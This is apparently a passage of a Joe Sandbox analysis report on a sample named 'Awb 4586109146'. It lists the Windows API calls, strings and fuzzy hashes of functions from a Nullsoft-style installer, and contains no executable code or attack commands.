                                                                    • Opcode Fuzzy Hash: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                                    • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,00441800,75573420,00000000), ref: 004059F5
                                                                    • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,00441800,75573420,00000000), ref: 00405A3D
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A60
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A66
                                                                    • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A76
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: \*.*
                                                                    • API String ID: 2035342205-1173974218
                                                                    • Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                    • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                    • Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                    • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                    • GetClientRect.USER32(?,?), ref: 0040550B
                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                    • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                      • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                    • ShowWindow.USER32(00000000), ref: 0040565A
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                    • ShowWindow.USER32(00000008), ref: 004056A9
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                    • CreatePopupMenu.USER32 ref: 004056EE
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                    • GetWindowRect.USER32(?,?), ref: 00405722
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                    • OpenClipboard.USER32(00000000), ref: 00405783
                                                                    • EmptyClipboard.USER32 ref: 00405789
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                    • CloseClipboard.USER32 ref: 004057E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                                    • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                    • Opcode Fuzzy Hash: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                                    • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                    • ShowWindow.USER32(?), ref: 00403DB1
                                                                    • DestroyWindow.USER32 ref: 00403DC5
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                    • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                    • GetDlgItem.USER32(?,?), ref: 00403ECB
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F40
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                    • EnableWindow.USER32(?,?), ref: 00404019
                                                                    • EnableWindow.USER32(?,?), ref: 00404034
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040404A
                                                                    • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404069
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                    • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                    • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 184305955-0
                                                                    • Opcode ID: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                                    • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                    • Opcode Fuzzy Hash: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                                    • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                    APIs
                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                    • lstrcatW.KERNEL32(00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800,75573420,0043F000,00000000), ref: 00403A2B
                                                                    • lstrlenW.KERNEL32(00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800), ref: 00403AAB
                                                                    • lstrcmpiW.KERNEL32(00432E78,.exe,00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                    • GetFileAttributesW.KERNEL32(00432E80), ref: 00403AC9
                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,0043F800), ref: 00403B12
                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                    • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                    • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                    • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-1115850852
                                                                    • Opcode ID: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                                    • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                    • Opcode Fuzzy Hash: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                                    • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040448E
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044BF
                                                                    • GetSysColor.USER32(?), ref: 004044D0
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                    • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                    • SendMessageW.USER32(00000000), ref: 00404573
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                    • SetCursor.USER32(00000000), ref: 004045F2
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                    • SetCursor.USER32(00000000), ref: 0040460E
                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040463D
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: N$gC@
                                                                    • API String ID: 3103080414-4003572143
                                                                    • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                    • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                    • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                    • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                    • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                    • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                    • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                    • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                    • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                    • wsprintfA.USER32 ref: 00405F85
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                                    • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                    • Opcode Fuzzy Hash: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                                    • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                    • lstrcmpiW.KERNEL32(00432E80,0042D248,00000000,?,?), ref: 00404889
                                                                    • lstrcatW.KERNEL32(?,00432E80), ref: 00404895
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                      • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                      • Part of subcall function 0040654E: CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                      • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                      • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                      • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A
                                                                    • API String ID: 2624150263-3554254475
                                                                    • Opcode ID: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                                    • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                    • Opcode Fuzzy Hash: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                                    • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                    Strings
                                                                    • soft, xrefs: 00402FCB
                                                                    • Error launching installer, xrefs: 00402F2D
                                                                    • Inst, xrefs: 00402FC2
                                                                    • Null, xrefs: 00402FD4
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                    • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                    • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                    • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(00432E80,00000400), ref: 0040641D
                                                                    • GetWindowsDirectoryW.KERNEL32(00432E80,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                    • SHGetSpecialFolderLocation.SHELL32(00405359,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                    • SHGetPathFromIDListW.SHELL32(?,00432E80), ref: 0040647A
                                                                    • CoTaskMemFree.OLE32(?), ref: 00406485
                                                                    • lstrcatW.KERNEL32(00432E80,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                    • lstrlenW.KERNEL32(00432E80,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 717251189-730719616
                                                                    • Opcode ID: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                                    • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                    • Opcode Fuzzy Hash: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                                    • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
